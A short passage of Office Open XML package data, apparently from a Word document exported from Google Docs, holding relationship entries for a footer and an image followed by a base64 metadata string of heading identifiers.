Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.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mKt+St+N29czha+j0tcTu1ve0g==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLjQ2c244aHYxNnVvNzIOaC5yMWdjcjlicTRycG4yDmgucHI5NHU3amFxNml0Mg5oLmIyenNyOHlhemViNjINaC5iZWttY2k4dTFlMDIOaC5zNWwwN3BzMGMxbXAyDmguMTc1ZjVjczk0ejBvOAByITFqTnB4WVdHc2FCN2IxYTRPbHh3Y2ZGRWw3X1QwWnhh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